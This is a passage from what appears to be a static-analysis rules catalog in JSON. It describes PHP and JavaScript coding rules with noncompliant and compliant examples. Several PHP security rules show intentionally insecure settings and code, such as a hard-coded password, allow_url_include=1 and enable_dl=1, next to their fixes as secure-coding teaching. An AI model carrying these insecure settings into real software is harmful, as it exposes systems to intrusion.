}\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() {\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n private static $somevar = \"hello\";\n const CONSTANT = 42;\n\n private static function foo()\n {\n $var = self::$somevar . self::CONSTANT; \/\/ Should be OK\n self::foo(); \/\/ Should be OK\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. Writing colors in upper case makes them stand out at such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff'; \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff'; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF'; \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF'; \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\"); \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this->params()->fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient that simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Alias<\/th>\n <th>Replacement<\/th>\n <\/tr>\n <tr>\n <td><code>chop<\/code><\/td>\n <td><code>rtrim<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>close<\/code><\/td>\n <td><code>closedir<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>doubleval<\/code><\/td>\n <td><code>floatval<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>fputs<\/code><\/td>\n <td><code>fwrite<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ini_alter<\/code><\/td>\n <td><code>ini_set<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_double<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_integer<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_long<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_real<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_writeable<\/code><\/td>\n <td><code>is_writable<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>join<\/code><\/td>\n <td><code>implode<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>key_exists<\/code><\/td>\n <td><code>array_key_exists<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>magic_quotes_runtime<\/code><\/td>\n <td><code>set_magic_quotes_runtime<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>pos<\/code><\/td>\n <td><code>current<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>show_source<\/code><\/td>\n <td><code>highlight_file<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>sizeof<\/code><\/td>\n <td><code>count<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>strchr<\/code><\/td>\n <td><code>strstr<\/code><\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n Broken Authentication and Session Management <\/li>\n <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n firstActionInBlock();\n secondAction(); \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++)\n $str = $array[$i];\n doTheThing($str); \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n firstActionInBlock();\n secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++) {\n $str = $array[$i];\n doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct() {\n $this->object = new SomeOtherClass(); \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct(SomeOtherClass $object) {\n $this->object = $object;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\" Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\" ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URL's. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to urls when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n <li> see the URL over the user's shoulder <\/li>\n <li> be sent the URL by the user <\/li>\n <li> retrieve the URL from browser history <\/li>\n <li> ... <\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n <li> It can significantly impair the readability of the code. <\/li>\n <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. <\/li>\n <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n other than that cause by the increment or decrement operator <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n effects <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a < $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n echo(\"i = $i\");\n $i++;\n if ($i < 10){\n goto loop;\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++){\n echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":92,"p":1,"ps":500,"rules":[{"key":"common-js:InsufficientBranchCoverage","repo":"common-js","name":"Branches should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the branch coverage on this file is less than the required threshold.It gives the number of branches to be covered in order to reach the required threshold.","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"minimumBranchCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"javascript:ArrayAndObjectConstructors","repo":"javascript","name":"Array constructors should not be used","htmlDesc":"<p>Array literals should always be preferred to Array constructors.<\/p>\n<p>Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:<\/p>\n<ul>\n <li> If the argument is a number and it is a natural number the length will be equal to the value of the argument. <\/li>\n <li> If the argument is a number, but not a natural number an exception will be thrown. <\/li>\n <li> Otherwise the array will have one element with the argument as its value. <\/li>\n<\/ul>\n<p>For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = new Array(x1, x2, x3); \/\/ Noncompliant. Results in 3-element array.\nvar a2 = new Array(x1); \/\/ Noncompliant and variable in results\nvar a3 = new Array(); \/\/ Noncompliant. Results in 0-element array.\n\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar a1 = [x1, x2, x3];\nvar a2 = [x1];\nvar a3 = [];\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:AssignmentWithinCondition","repo":"javascript","name":"Assignments should not be made from within sub-expressions","htmlDesc":"<p>Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ((str = cont.substring(pos1, pos2)) != '') { \/\/ Noncompliant\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Assignments in <code>while<\/code> statement conditions, and assignments enclosed in relational expressions are allowed.<\/p>\n<pre>\nwhile ((line = nextLine()) != null) {...} \/\/ Compliant\n\nwhile (line = nextLine()) {...} \/\/ Compliant\n\nif (line = nextLine()) {...} \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.1 - Assignment operators shall not be used in expressions that yield a Boolean value <\/li>\n <li> MISRA C++:2008, 6-2-1 - Assignment operators shall not be used in sub-expressions <\/li>\n <li> MISRA C:2012, 13.4 - The result of an assignment operator should not be used <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/481.html\">MITRE, CWE-481<\/a> - Assigning instead of Comparing <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/nYFtAg\">CERT, EXP45-C.<\/a> - Do not perform assignments in selection statements <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1gCTAw\">CERT, EXP51-J.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KQvhAg\">CERT, EXP19-CPP.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KYIyAQ\">CERT, MSC02-CPP.<\/a> - Avoid errors of omission <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:BitwiseOperators","repo":"javascript","name":"Bitwise operators should not be used in boolean contexts","htmlDesc":"<p>The bitwise operators <code>&<\/code>, <code>|<\/code> can be mistaken for the boolean operators <code>&&<\/code> and <code>||<\/code>.\n<\/p>\n<p>This rule raises an issue when <code>&<\/code> or <code>|<\/code> is used in a boolean context.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a & b) { ... } \/\/ Noncompliant; & used in error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a && b) { ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a file contains other bitwise operations, (<code>^<\/code>, <code><<<\/code>, <code>>>><\/code>, <code>>><\/code>,\n<code>~<\/code>, <code>&=<\/code>, <code>^=<\/code>, <code>|=<\/code>, <code><<=<\/code>, <code>>>=<\/code>, <code>>>>=<\/code> and\n<code>&<\/code> or <code>|<\/code> used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the file.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:BoundOrAssignedEvalOrArguments","repo":"javascript","name":"\"eval\" and \"arguments\" should not be bound or assigned","htmlDesc":"<p><code>eval<\/code> is used to evaluate a string as JavaScript code, and <code>arguments<\/code> is used to access function arguments through indexed\nproperties. As a consequence, <code>eval<\/code> and <code>arguments<\/code> should not be bound or assigned, because doing so would overwrite the\noriginal definitions of those two reserved words. <\/p>\n<p>What's more, using either of those two names to assign or bind will generate an error in JavaScript strict mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval = 17; \/\/ Noncompliant\narguments++; \/\/ Noncompliant\n++eval; \/\/ Noncompliant\nvar obj = { set p(arguments) { } }; \/\/ Noncompliant\nvar eval; \/\/ Noncompliant\ntry { } catch (arguments) { } \/\/ Noncompliant\nfunction x(eval) { } \/\/ Noncompliant\nfunction arguments() { } \/\/ Noncompliant\nvar y = function eval() { }; \/\/ Noncompliant\nvar f = new Function(\"arguments\", \"return 17;\"); \/\/ Noncompliant\n\nfunction fun() {\n if (arguments.length == 0) { \/\/ Compliant\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nresult = 17;\nargs++;\n++result;\nvar obj = { set 